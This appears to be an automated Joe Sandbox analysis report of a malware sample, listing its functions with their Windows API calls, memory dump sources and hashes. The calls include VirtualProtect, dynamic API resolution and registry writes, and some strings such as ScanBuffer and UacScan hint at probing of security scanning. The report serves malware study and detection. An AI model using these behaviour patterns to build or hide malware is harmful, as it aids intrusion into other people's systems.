                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 503785936-0
                                                                                                                                                    • Opcode ID: 043b0b7b96fed94b431f8989b8e30ac3e13ed599212f4de3c354535af918a07b
                                                                                                                                                    • Instruction ID: 56e15995bb97aedb2f0c37586e19c9047f986b639103466c824b53296e3c1471
                                                                                                                                                    • Opcode Fuzzy Hash: 043b0b7b96fed94b431f8989b8e30ac3e13ed599212f4de3c354535af918a07b
                                                                                                                                                    • Instruction Fuzzy Hash: 3A319F30A042489BEF40EFA5C881BAEBBB6EF48304F918565E505A7380D7749E05CFB5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DFD316 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02E45798), ref: 02DFD35C
                                                                                                                                                    • RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD394
                                                                                                                                                    • RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD39F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 779948276-0
                                                                                                                                                    • Opcode ID: fc48f3a8b0969c077f920d0ba9de5e60e1b97996e8baef57ad8a6f173c24141f
                                                                                                                                                    • Instruction ID: 5a6db37687052894080042e79aacdc5a30e62d2f7a7ac1bea3ec7179479ff023
                                                                                                                                                    • Opcode Fuzzy Hash: fc48f3a8b0969c077f920d0ba9de5e60e1b97996e8baef57ad8a6f173c24141f
                                                                                                                                                    • Instruction Fuzzy Hash: C911D770640204ABEB50FB69DC81D5D7BEDEB18310F904475B519E7350DB34ED418E74
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DFD318 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02E45798), ref: 02DFD35C
                                                                                                                                                    • RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD394
                                                                                                                                                    • RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD39F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 779948276-0
                                                                                                                                                    • Opcode ID: d82ff11e4911831cecf5b5999332b80ff99969f3e7fa884f086aa64b05a7f84f
                                                                                                                                                    • Instruction ID: 87628e5a3bb454ffbea485313433e442077c20a44d5ee10e15df21af98786f73
                                                                                                                                                    • Opcode Fuzzy Hash: d82ff11e4911831cecf5b5999332b80ff99969f3e7fa884f086aa64b05a7f84f
                                                                                                                                                    • Instruction Fuzzy Hash: AC11D470640208ABEB50FBA9DC81E9E7BEDEB28310F904465A51AE7350DB34EE418E74
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF7BE8 Relevance: 4.6, APIs: 3, Instructions: 52libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                      • Part of subcall function 02DF7B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02DF7BA5,?,?,00000000,00000000), ref: 02DF7B61
                                                                                                                                                      • Part of subcall function 02DF7B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02DF7B67
                                                                                                                                                      • Part of subcall function 02DF7B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02DF7BA5,?,?,00000000,00000000), ref: 02DF7B81
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2543409266-0
                                                                                                                                                    • Opcode ID: 7819277d09ff971fcfaebcb5e888be240c1593ca0c0876a4fe156e7366d56dd0
                                                                                                                                                    • Instruction ID: d61fc6cddd560006188a95bdf2c086bc1723358791c6c5a74337b571c4240d1b
                                                                                                                                                    • Opcode Fuzzy Hash: 7819277d09ff971fcfaebcb5e888be240c1593ca0c0876a4fe156e7366d56dd0
                                                                                                                                                    • Instruction Fuzzy Hash: 7F010470A80248AFFF40FF65DC52A5EB7A9EB54304FD05464A60AA3340DA749C00CB78
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEE320 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                    • Opcode ID: d8850f08b6b46cf38412211c2ad8b0b80bdfe7ce4b991c3c50dc78e1eab28146
                                                                                                                                                    • Instruction ID: 6449f7e9c1fe25310dca8b2ac0e64da33f7f3603c50e16c61e0d9adc33d4fb1f
                                                                                                                                                    • Opcode Fuzzy Hash: d8850f08b6b46cf38412211c2ad8b0b80bdfe7ce4b991c3c50dc78e1eab28146
                                                                                                                                                    • Instruction Fuzzy Hash: 15F0C264714110CACF217B34C884AAE2F9AEF40332F501462A8CF5B395DB36CC05C772
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156935A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 156935CA
                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 156935E7
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 156935F2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                    • Opcode ID: 743beb9fcfa4f5b33f486b773bdba2342a86bdf329dee12886ca3960a8052daa
                                                                                                                                                    • Instruction ID: 2774851d87c77d586a0b386fb4d9ce8469e76ba0fc08e996a25c068406dd6970
                                                                                                                                                    • Opcode Fuzzy Hash: 743beb9fcfa4f5b33f486b773bdba2342a86bdf329dee12886ca3960a8052daa
                                                                                                                                                    • Instruction Fuzzy Hash: 82016D7AA01128BBCB209A95DD49DDE7FBEEB84260F004169FE45E2200DB319E55DBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15693549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 15693569
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 15693587
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 15693592
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                    • Opcode ID: 88d08bb60cb151af42c8b24495c22e452a06f884700b1f1d67d34a7bc86233df
                                                                                                                                                    • Instruction ID: 09909245470450c987541cb56cd2bf5da7a1f312970ee68e32252ddda2d4ba43
                                                                                                                                                    • Opcode Fuzzy Hash: 88d08bb60cb151af42c8b24495c22e452a06f884700b1f1d67d34a7bc86233df
                                                                                                                                                    • Instruction Fuzzy Hash: 63F0F97690021CBFDF109EA0DD45FEA7BBDEB08721F104099FE04E6140E6315A54EBD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE4D14 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
                                                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 02DE4D1F
                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02DE4D31
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                    • Opcode ID: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
                                                                                                                                                    • Instruction ID: 3f360c44af4a5154c59d5053e461980a36f2ded1737cf0553c9879e9937726de
                                                                                                                                                    • Opcode Fuzzy Hash: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
                                                                                                                                                    • Instruction Fuzzy Hash: 10E0ECB82052059EEE153F218C41A3E326AEF81745F988499A806CE350DB74CC41AE38
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF7098 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02DF7396
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeString
                                                                                                                                                    • String ID: H
                                                                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                                                                    • Opcode ID: 79a4d74a5d07d12307159c483fa99c9b78141ee3fadb39b30da3d8ea4aa83f2d
                                                                                                                                                    • Instruction ID: 2ac81e474443efcc013be61e106c5a8af7d0f596a5eaa890250aa7c8deae43be
                                                                                                                                                    • Opcode Fuzzy Hash: 79a4d74a5d07d12307159c483fa99c9b78141ee3fadb39b30da3d8ea4aa83f2d
                                                                                                                                                    • Instruction Fuzzy Hash: 4DB1E074A01209AFEB50CF98D880A9DFBF2FF89314F258569E959AB320D730AC45CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEE71C Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 02DEE73D
                                                                                                                                                      • Part of subcall function 02DEE320: VariantClear.OLEAUT32(?), ref: 02DEE32F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearCopy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 274517740-0
                                                                                                                                                    • Opcode ID: 1a5c6b004e10b3daca582ae5b09f2b9a929043f5715ad96fc833677beffb9e71
                                                                                                                                                    • Instruction ID: 35d558b1a380e6853a2f49038cc6a8f01ff3d264d448d8eed2bbc5afdcc4b735
                                                                                                                                                    • Opcode Fuzzy Hash: 1a5c6b004e10b3daca582ae5b09f2b9a929043f5715ad96fc833677beffb9e71
                                                                                                                                                    • Instruction Fuzzy Hash: 0711E52470065097DF20BF29C8C5A6B27EFEF88730B144466EA8B8B345DB31DC40CAB2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEE3B8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1927566239-0
                                                                                                                                                    • Opcode ID: a40804c82ee5a6153a0c29b65b5bbd4cc51131cfd2f4eb0e1694f6e292f2bb7b
                                                                                                                                                    • Instruction ID: bd178ee7bad3a4bed3e76fcce2c5d4d20b6ce69ae51d9966fcdd0eaa980d9b16
                                                                                                                                                    • Opcode Fuzzy Hash: a40804c82ee5a6153a0c29b65b5bbd4cc51131cfd2f4eb0e1694f6e292f2bb7b
                                                                                                                                                    • Instruction Fuzzy Hash: A2312C75A04208AFEF11EEA8C884AAE77E8EF0C224F444562F90AD6350D775ED54CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF6D28 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,?,00000000,02DF6D75,?,?,?,00000000), ref: 02DF6D55
                                                                                                                                                      • Part of subcall function 02DE4C24: SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeFromProgString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4225568880-0
                                                                                                                                                    • Opcode ID: 943d77bb4e57999696732dda55cb2c0c75fcab70462f1d758536092de1c07bd9
                                                                                                                                                    • Instruction ID: d13c58292a5ed9c177332f5c77eb6ea06ba5a9b8a626b97a5ded67904c2abad8
                                                                                                                                                    • Opcode Fuzzy Hash: 943d77bb4e57999696732dda55cb2c0c75fcab70462f1d758536092de1c07bd9
                                                                                                                                                    • Instruction Fuzzy Hash: 1FE06532604608BFEB11FA72EC5195D77FDDB49710F620471A90193700D9759E0499B9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE582C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(02DE0000,?,00000105), ref: 02DE584A
                                                                                                                                                      • Part of subcall function 02DE5A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5AAC
                                                                                                                                                      • Part of subcall function 02DE5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5ACA
                                                                                                                                                      • Part of subcall function 02DE5A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5AE8
                                                                                                                                                      • Part of subcall function 02DE5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DE5B06
                                                                                                                                                      • Part of subcall function 02DE5A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DE5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DE5B4F
                                                                                                                                                      • Part of subcall function 02DE5A90: RegQueryValueExA.ADVAPI32(?,02DE5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DE5B95,?,80000001), ref: 02DE5B6D
                                                                                                                                                      • Part of subcall function 02DE5A90: RegCloseKey.ADVAPI32(?,02DE5B9C,00000000,?,?,00000000,02DE5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DE5B8F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2796650324-0
                                                                                                                                                    • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                                                    • Instruction ID: a6193f51a57de178c6be1700ee829cea5adda96c655cb987f9ded7b4e3ba0d7c
                                                                                                                                                    • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                                                    • Instruction Fuzzy Hash: 74E0ED71A002149BCF54EE5898C0A5637D8AB08798F844961EDAADF346D3B1DD548BE1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE7D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02DE7DB0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                    • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                    • Instruction ID: 6734ff965e2b0eb3f7cdbe0172d08ace4bfa1bc3417a91e0aba9466fef84c05a
                                                                                                                                                    • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                    • Instruction Fuzzy Hash: E4D05BB23091507AE620A95A6C44EBB5BDCCBC9771F10067DB568C3280D720CC01C6B1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE7E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02DFE0EE,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,UacInitialize), ref: 02DE7E23
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 951039ecee422536e3dea04a53b9578876d15029f98b4fa6b434c683e6939a5b
                                                                                                                                                    • Instruction ID: 9276b8505a456c0606e35c366208edc2e82d3e0db00f50c2caf3f8f0bf79699e
                                                                                                                                                    • Opcode Fuzzy Hash: 951039ecee422536e3dea04a53b9578876d15029f98b4fa6b434c683e6939a5b
                                                                                                                                                    • Instruction Fuzzy Hash: FFC08CA1212301166E9071FC0CC401A4288895413C7640BBDF02BE63D1D321CC12A8B0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE7E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02E01133,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC,ScanString), ref: 02DE7E47
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 3fca3ef7285960aff002ce6aaf6464954507beed463b747c503eea14233f1ce8
                                                                                                                                                    • Instruction ID: 87789a2fa57795a2a6bfc338537eec00bef489df66e35315e25afa6e02b5c714
                                                                                                                                                    • Opcode Fuzzy Hash: 3fca3ef7285960aff002ce6aaf6464954507beed463b747c503eea14233f1ce8
